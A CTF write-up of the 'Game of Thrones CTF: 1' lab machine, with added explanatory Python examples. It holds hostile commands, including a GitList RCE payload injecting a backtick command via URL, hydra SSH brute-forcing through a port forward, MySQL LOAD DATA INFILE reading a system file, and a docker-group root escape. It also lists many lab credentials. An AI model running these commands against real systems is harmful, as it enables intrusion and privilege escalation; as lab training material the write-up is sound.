Last updated: 15 Apr 24 09:27:10 (UTC)
GameOfThrones
By Lawcky 08/02/2024
Introduction
GameOfThrones
Difficulty : Hard
Additional info :
Name: Game of Thrones CTF: 1
Release date: 8 Sep 2017
Author: OscarAkaElvis
Series: Game of Thrones CTF
|NOTE| for this write-up every screenshot and resource is listed on this single page.
In this write-up
- nmap
- ffuf
- ftp
- burp-suite
- knockd (port knocking)
- hashcat
- mcrypt
- strings, binwalk & exiftool
- dig linux command
- webmin & cheerpJ
- postgresql
- ROT cipher
- imap
- GitList
- GitList RCE
- mysql
- read a system file through mysql
- port forwarding using ssh
- hydra
- docker group privesc
Write-Up
Nmap
Enumerating:
/the-tree/ : picture with text
source code :"You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
/secret-island/ : image and map link
source code :"Take this map and use it wisely. I want to be your friend" - Petyr (Littlefinger) Baelish
/direct-access-to-kings-landing/ : image
source code :"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
192.168.1.12:10000
Found the MAP
The write-up follows the order of the map.
The Dorne (FTP)
fail2ban is installed, so no brute-forcing; we also need a username/password other than anonymous.
After changing my User-Agent to Three-eyed-raven
(following the hint in the robots.txt above) and visiting /the-tree/ again, I get another image with a different source code :
<!--"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark"To enter in Dorne you must identify as oberynmartell. You still should find the password""3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them""The savages never crossed the wall. So you must look for them before crossing it"-->
Seeing the sequence 3487 64535 12345,
I recognised it from another machine I did and tried port knocking:
knock 192.168.1.12 3487 64535 12345
before port knocking
143/tcp filtered imap
after port knocking
143/tcp open imap Dovecot imapd
It turns out this was not necessary for the first flag, but it is done anyway.
Still needing more information, I went back to port 80 to gather more.
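To make clear what the knock sequence above actually gates, here is an added example (mine, not code from the write-up or from knockd) that models the server side of port knocking: every source address must hit the configured ports in order, each knock within a timeout of the previous one, and any wrong port or stale knock resets that source's progress. The SYN events are constructed.

```python
"""Port-knock sequence tracker (added example, not part of the original write-up).

Models what a daemon such as knockd does with the sequence 3487, 64535, 12345
seen in this write-up: each source must hit the ports in order, with each knock
arriving within `timeout` seconds of the previous one. A wrong port or a stale
knock resets that source's progress. The sample events below are constructed.
"""
from dataclasses import dataclass, field


@dataclass
class KnockTracker:
    sequence: tuple                                   # ports that must be hit, in order
    timeout: float = 5.0                              # seconds allowed between consecutive knocks
    progress: dict = field(default_factory=dict)      # src -> (next_index, last_knock_ts)

    def observe(self, src: str, port: int, ts: float) -> bool:
        """Feed one SYN (source, destination port, timestamp).

        Returns True when `src` completes the whole sequence, which is the
        moment a knock daemon would open the protected port for that source.
        """
        idx, last_ts = self.progress.get(src, (0, ts))
        # A knock that arrives too long after the previous one restarts the sequence.
        if idx > 0 and ts - last_ts > self.timeout:
            idx = 0
        if port == self.sequence[idx]:
            idx += 1                      # expected port: advance
        elif port == self.sequence[0]:
            idx = 1                       # wrong port but it is the first one: restart from it
        else:
            idx = 0                       # any other port resets progress for this source
        if idx == len(self.sequence):
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, ts)
        return False


# Constructed SYN log: (timestamp, source address, destination port).
SAMPLE_EVENTS = [
    (0.0, "10.0.0.5", 3487),
    (0.5, "10.0.0.5", 64535),
    (1.0, "10.0.0.5", 12345),   # completes the sequence -> gate opens for 10.0.0.5
    (2.0, "10.0.0.9", 3487),
    (2.5, "10.0.0.9", 12345),   # out of order -> progress reset
    (3.0, "10.0.0.9", 64535),
    (3.5, "10.0.0.9", 12345),   # sequence was reset, so this does not open anything
    (10.0, "10.0.0.7", 3487),
    (20.0, "10.0.0.7", 64535),  # ten seconds after the first knock: too slow, reset
    (20.5, "10.0.0.7", 12345),
]


def opened_sources(events, sequence=(3487, 64535, 12345), timeout=5.0):
    """Replay a SYN log and return the sources that completed the sequence."""
    tracker = KnockTracker(sequence, timeout)
    return [src for ts, src, port in events if tracker.observe(src, port, ts)]


if __name__ == "__main__":
    print(opened_sources(SAMPLE_EVENTS))   # only 10.0.0.5 gets the imap port opened
```

The timeout is what separates a deliberate knock from a port scan that happens to touch the right ports over a long window; lowering it (and logging resets) is the usual tuning on the defending side.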
Fuzzing,
I found http://192.168.1.12/h/
then /i/d/d/e/n/
source code : "My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys "Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light has shown me" - The Red Woman Melisandre
we now have :
user :
oberynmartell
in base64 :
b2JlcnlubWFydGVsbA==
password :
A_verySmallManCanCastAVeryLargeShad0w
in base64:
QV92ZXJ5U21hbGxNYW5DYW5DYXN0QVZlcnlMYXJnZVNoYWQwdw==
command :
ftp oberynmartell@192.168.1.12
+ password
fb8d98be1265dd88bac522e1b2182140
First flag found
The Wall & The North (http)
Mcrypt file
we get two things from that :
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
we also get a file
It is encrypted with the mcrypt tool and needs a passphrase in order to be decrypted.
We know that the hash format is md5(md5($s).$p),
we have the user nobody,
and the hash/salt pair 6000e084bf18c302eae4559d48cb520c$2hY68a.
Running hashcat mode 20 directly on this fails,
so, since we know the format, let's instead give hashcat the md5sum of the salt 2hY68a as the salt:
echo -n '2hY68a' | md5sum
0cbb5be2c4504bed573802efbd909965
echo -n 6000e084bf18c302eae4559d48cb520c:0cbb5be2c4504bed573802efbd909965 > hash
hashcat -m 20 hash ~/tools/seclists/rockyou.txt
nobody:stark
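Why the md5sum trick works is worth spelling out: md5(md5($s).$p) with the inner md5 precomputed is just md5($salt.$pass), which is hashcat mode 20. The following is an added example (my code, not the write-up's) that verifies the scheme in Python against the hash, salt and password above; the candidate list is a constructed stand-in for rockyou.txt.

```python
"""Verifying the md5(md5($s).$p) scheme from the write-up (added example, not the
page's own code). HASH, SALT and the recovered password come from the write-up;
CANDIDATES is a constructed stand-in for a real wordlist."""
import hashlib
from typing import Iterable, Optional

HASH = "6000e084bf18c302eae4559d48cb520c"   # hash part of nobody's entry
SALT = "2hY68a"                             # salt part, after the '$'


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode()).hexdigest()


def md5_md5salt_pass(salt: str, password: str) -> str:
    """md5(md5($s).$p): hash the salt, append the password, hash again.

    Because md5($s) is a fixed string, handing it to hashcat as the salt turns
    the scheme into md5($salt.$pass), i.e. mode 20, which is what the write-up does.
    """
    return md5_hex(md5_hex(salt) + password)


def crack(target: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose md5(md5(salt).candidate) equals target."""
    for pw in candidates:
        if md5_md5salt_pass(salt, pw) == target:
            return pw
    return None


CANDIDATES = ["winter", "lannister", "stark", "dragon"]   # constructed mini wordlist

if __name__ == "__main__":
    print(md5_hex(SALT))                   # the value fed to hashcat as the salt
    print(crack(HASH, SALT, CANDIDATES))   # the password for nobody
```

The lesson on the defending side is that a custom construction like md5(md5($s).$p) adds no real cost for an attacker: one extra MD5 per salt, computed once, collapses it to a standard fast hash mode.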
back to our mcrypt file
Http
jonsnow:Ha1lt0th3k1ng1nth3n0rth!!!
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
after adding it to /etc/hosts :
source code : Welcome to Winterfell You conquered the Kingdom of the North. This is your second kingdom flag! 639bae9ac6b3e1a84cebb7b403297b79 We must do something here before travelling to Iron Islands, my lady" - Podrick Payne "Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
639bae9ac6b3e1a84cebb7b403297b79
Second flag found
Iron Islands (DNS)
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
This seems to refer to one of the images on the website, so let's see if anything is hidden inside.
Running strings on the images turned up a few things, for example :
"Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
Using dnsenum, then by hand,
I tried :
dig Timef0rconqu3rs.7kingdoms.ctf @192.168.1.12
&
dig VGltZWYwcmNvbnF1M3JzCg==.7kingdoms.ctf @192.168.1.12
&
nslookup 'VGltZWYwcmNvbnF1M3JzCg==.7kingdoms.ctf' 192.168.1.12
&
sudo iodine -f -P Timef0rconqu3rs 192.168.1.12 7kingdoms.ctf
&
dig Timef0rconqu3rs @192.168.1.12
The right command was :
dig txt Timef0rconqu3rs.7kingdoms.ctf -p 53 @192.168.1.12
Timef0rconqu3rs.7kingdoms.ctf. 86400 IN TXT "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
5e93de3efa544e85dcd6311732d28f95
Third flag found
Savages Flag (secret)
Based on the sentence:
"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
I thought the secret flag could be inside the music on the home page,
so I downloaded both the .wav and the .mp3.
Nothing was hidden inside the .wav, but inside the .mp3, using the strings command, I found the flag.
Later in the write-up I found out that this flag wasn't complete; using a better-suited tool such as exiftool I was able to get the full flag :
8bf8854bebe108183caeb845c7676ae4
First secret flag found
Stormlands (webmin)
aryastark/N3ddl3_1s_a_g00d_sword#!
http://stormlands.7kingdoms.ctf:10000
we are looking for ~/flag.txt
http://stormlands.7kingdoms.ctf:10000/file/
is bugged.
Since browsers dropped Java support at the end of 2017, this part cannot be done directly anymore.
After 3 different web browsers, 4 unsuccessful installations of Chromium on 2 different machines with the CheerpJ plugin, all of that on 2 different operating systems, I finally managed to make Chromium work with CheerpJ to access the file !
Installation time : about 1h30min
Getting the flag : literally 10 seconds
The credentials to access to the Mountain and the Vale kingdom are: user/pass: robinarryn/cr0wn_f0r_a_King-_ db: mountainandthevale pgAdmin magic will not work. Command line should be used on that kingdom - Talisa Maegyr
8fc42c6ddf9966db3b09e84365034357
Fourth flag found
Mountain and the Vale (postgresql)
robinarryn:cr0wn_f0r_a_King-_
psql -h 192.168.1.12 -p 5432 -U robinarryn -W -d mountainandthevale
Let's search the databases :
kill_list
Bravoos book
Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
This looks like a ROT cipher.
Let's first go back to the ROT.
City Of Bravoos (secret)
Once deciphered it reads :
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
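The book is a plain Caesar shift (decryption shift 16, i.e. ROT-10 on the way in). As an added example, not code from the write-up, here is a Python brute-forcer that tries all 26 shifts and picks the one whose output contains the most common English words; the ciphertext is the one from the book above and the small scoring word list is a constructed stand-in for a real frequency model.

```python
"""Decoding the Braavos book with a Caesar shift (added example, not the page's code).
CIPHER is the text from the write-up; COMMON is a constructed mini word list used to
score candidate plaintexts."""
import string

CIPHER = ("Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. "
          "Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. "
          "Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. "
          "Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc")

COMMON = {"the", "you", "to", "and", "of", "your", "be", "it", "on", "this", "will", "as"}


def caesar_shift(text: str, k: int) -> str:
    """Shift every ASCII letter forward by k positions; case, digits and punctuation are kept."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + k) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> int:
    """Count tokens that are common English words (punctuation stripped from the ends)."""
    words = [w.strip(string.punctuation).lower() for w in text.split()]
    return sum(1 for w in words if w in COMMON)


def best_shift(text: str) -> int:
    """Try all 26 shifts and return the one whose output looks most like English."""
    return max(range(26), key=lambda k: english_score(caesar_shift(text, k)))


if __name__ == "__main__":
    k = best_shift(CIPHER)
    print(k)                         # 16
    print(caesar_shift(CIPHER, k))   # the plaintext quoted above
```

Scoring on a handful of function words is enough here because the text is long; for short ciphertexts a letter-frequency (chi-squared) score is the more robust choice.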
the missing page is the fifth
so : TheRedWomanMelisandre
3f82c41a70a8b0cfec9052252d9fd721
Second secret flag found
There is a mention of knocking and 'POLITE' people, which means the port knocking was supposed to be done here; anyway, it is already done.
There is also a mention of the fact that we 'OWN' our destiny, which might have something to do with permissions, and a mention of a secret tunnel in a Docker reference, probably hinting at a Docker escape.
I found the flag in the relation table. I cannot read it yet, but I am indeed its owner, so I just have to change the permissions.
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO robinarryn;
Then we open the table
and get a base64-encoded message :
echo 'TmljZSEgeW91IGNvbnF1ZXJlZCB0aGUgS2luZ2RvbSBvZiB0aGUgTW91bnRhaW4gYW5kIHRoZSBWYWxlLiBUaGlzIGlzIHlvdXIgZmxhZzogYmIzYWVjMGZkY2RiYzI5NzQ4OTBmODA1YzU4NWQ0MzIuIE5leHQgc3RvcCB0aGUgS2luZ2RvbSBvZiB0aGUgUmVhY2guIFlvdSBjYW4gaWRlbnRpZnkgeW91cnNlbGYgd2l0aCB0aGlzIHVzZXIvcGFzcyBjb21iaW5hdGlvbjogb2xlbm5hdHlyZWxsQDdraW5nZG9tcy5jdGYvSDFnaC5HYXJkM24ucG93YWggLCBidXQgZmlyc3QgeW91IG11c3QgYmUgYWJsZSB0byBvcGVuIHRoZSBnYXRlcw==' | base64 -d
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah , but first you must be able to open the gates
bb3aec0fdcdbc2974890f805c585d432
Fifth flag found
The Reach (imap)
olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah
Since we already did the port knocking, we don't have to do it again.
Raw IMAP commands are tedious, so let's just use an IMAP client.
aee750c2009723355e2ac57564f9c3db
Sixth flag found
The Rock (gitlist)
Now you can auth on next Kingdom (The Rock, port 1337)
TywinLannister:LannisterN3verDie!
We can connect to it at :
http://192.168.1.12:1337/
Enumerating
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
This looks like hex.
more text…
even more text…
Exploiting
Let's try a remote code execution. Since we have no way of knowing the actual version of the GitList service, I used an exploit that was published before the release of the machine.
By default the exploit does not ask for credentials; to work around this we use the URL format http://user:pass@domain.com/
so that it still logs in.
Decoding the hex above, 2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874,
gives
/home/tyrionlannister/checkpoint.txt
Let's try to read this file with the exploit.
I set up a listening netcat to receive the file in case it works.
The exploit runs but does not seem to execute any command.
After searching through more known RCE exploits, I found one that works through the URL :
http://192.168.1.12:1337/casterly-rock/tree/master/%22%22%60whoami%60/
i got a reverse shell
The King’s Landing
cerseilannister:_g0dsHaveNoMercy_
db: kingslanding
mysql -h 192.168.1.12 -u cerseilannister -p -D kingslanding
-..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --.
It is Morse code :
/ETC/MYSQL/FLAG
After looking at the privileges,
using a CREATE TABLE ..; statement
followed by LOAD DATA INFILE '..' INTO TABLE ..;
I can read the file.
c8d46d341bea4fd5bff866a65ff8aea9
Seventh flag found
Dragonglass mine (secret)
daenerystargaryen:.Dracarys4thewin.
We now have access to a hidden machine, 172.25.0.2.
We also have a wordlist and a note that fail2ban is not set up for this host.
Let's create a port forward from our machine to that hidden machine through the SSH connection, then use that same forward to brute-force the root user with the given wordlist.
ssh -L 10000:172.25.0.2:22 daenerystargaryen@192.168.1.12
It worked !
Now hydra :
hydra -l root -P digger.txt ssh://127.0.0.1:10000
root:Dr4g0nGl4ss!
a8db1d82db78ed452ba0882fb9554fc9
Third secret flag found
White Walkers Final Battle (ssh)
branstark:Th3_Thr33_Ey3d_Raven
“The time has come” - The Three Eyed Raven
Using the docker group we can easily escalate to the root user,
following HackTricks, with the docker image ironislands :
docker run -it -v /:/host/ ironislands chroot /host/ bash
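The reason that one command is enough is that membership of the docker group is root-equivalent: any member can bind-mount / into a container and chroot into it. On the defending side the check is simply who is in that group. Here is an added example (my code, not from the write-up) that parses /etc/group-formatted text and reports users who hold such root-equivalent group memberships; the group file content is constructed, and on a real host you would read /etc/group instead.

```python
"""Audit of root-equivalent group membership (added example, not from the write-up).

Members of groups such as docker (and, for the same kind of reason, lxd and disk)
can bypass local access control, which is exactly what the docker escape above
relies on. SAMPLE_GROUP_FILE is constructed; read /etc/group on a real host."""
from typing import Dict, Iterable, List

# Groups whose membership is treated as root-equivalent for this audit.
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk"}

SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,branstark
docker:x:999:branstark,jonsnow
lxd:x:113:
ssh:x:114:
"""


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Return {group_name: [members]} from /etc/group-formatted text.

    Each line is name:password:gid:member1,member2; the member field may be empty.
    """
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def root_equivalent_users(text: str,
                          watch: Iterable[str] = ROOT_EQUIVALENT_GROUPS) -> Dict[str, List[str]]:
    """Map each user to the watched groups that grant them root-equivalent access."""
    watch = set(watch)
    findings: Dict[str, List[str]] = {}
    for group, members in parse_group_file(text).items():
        if group in watch:
            for user in members:
                findings.setdefault(user, []).append(group)
    return findings


if __name__ == "__main__":
    for user, groups in root_equivalent_users(SAMPLE_GROUP_FILE).items():
        print(f"{user}: root-equivalent via {', '.join(groups)}")
```

The mitigation is the usual one: treat docker group membership like sudo without a password, grant it only where it is needed, and alert on changes to that group.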
secret_flag1=8bf8854bebe108183caeb845c7676ae4
secret_flag2=3f82c41a70a8b0cfec9052252d9fd721
secret_flag3=a8db1d82db78ed452ba0882fb9554fc9
The result is apparently
8bf8854be9fd721b9554fc9
and the file type of final_battle
is a zip archive.
final_battle: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
By analysing this :
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
we understand that the final password is the last 10 characters of each of the three secret flags, concatenated together.
45c7676ae4252d9fd7212fb9554fc9
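To reproduce the derivation mechanically, here is an added example (mine, not the write-up's code) that implements the pseudo-code above in Python: the last 10 characters of each secret flag, joined in order. It also refuses any flag that is not a full 32-character MD5 string, which is exactly what the incomplete flag recovered with strings from the .mp3 earlier would have produced, and why that truncated value would have given a wrong password.

```python
"""Deriving the final_battle archive password from the three secret flags
(added example, not the write-up's own code). SECRET_FLAGS are the values collected
above; final_password() mirrors the pseudo-code:
concat(substr(flag, strlen(flag) - 10, strlen(flag)) for each flag)."""
import re
from typing import Iterable

SECRET_FLAGS = [
    "8bf8854bebe108183caeb845c7676ae4",   # secret flag 1 (.mp3 metadata)
    "3f82c41a70a8b0cfec9052252d9fd721",   # secret flag 2 (Braavos)
    "a8db1d82db78ed452ba0882fb9554fc9",   # secret flag 3 (Dragonglass mine)
]

MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def tail(s: str, n: int = 10) -> str:
    """substr(s, strlen(s) - n, strlen(s)) from the pseudo-code: the last n characters."""
    return s[len(s) - n:]


def final_password(flags: Iterable[str], n: int = 10) -> str:
    """Concatenate the last n characters of each flag, in the given order.

    A flag that is not a complete MD5 string (for example one truncated by a
    careless extraction tool) raises ValueError rather than silently yielding a
    wrong password.
    """
    flags = list(flags)
    for f in flags:
        if not MD5_RE.match(f):
            raise ValueError(f"not a complete MD5 flag: {f!r}")
    return "".join(tail(f, n) for f in flags)


if __name__ == "__main__":
    print(final_password(SECRET_FLAGS))   # password for the final_battle archive
```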
8e63dcd86ef9574181a9b6184ed3dde5
Final flag found
The GameOfThrones machine is finally finished.
Final Message
The 11 flags make up a sentence; let's use hashcat to recover it.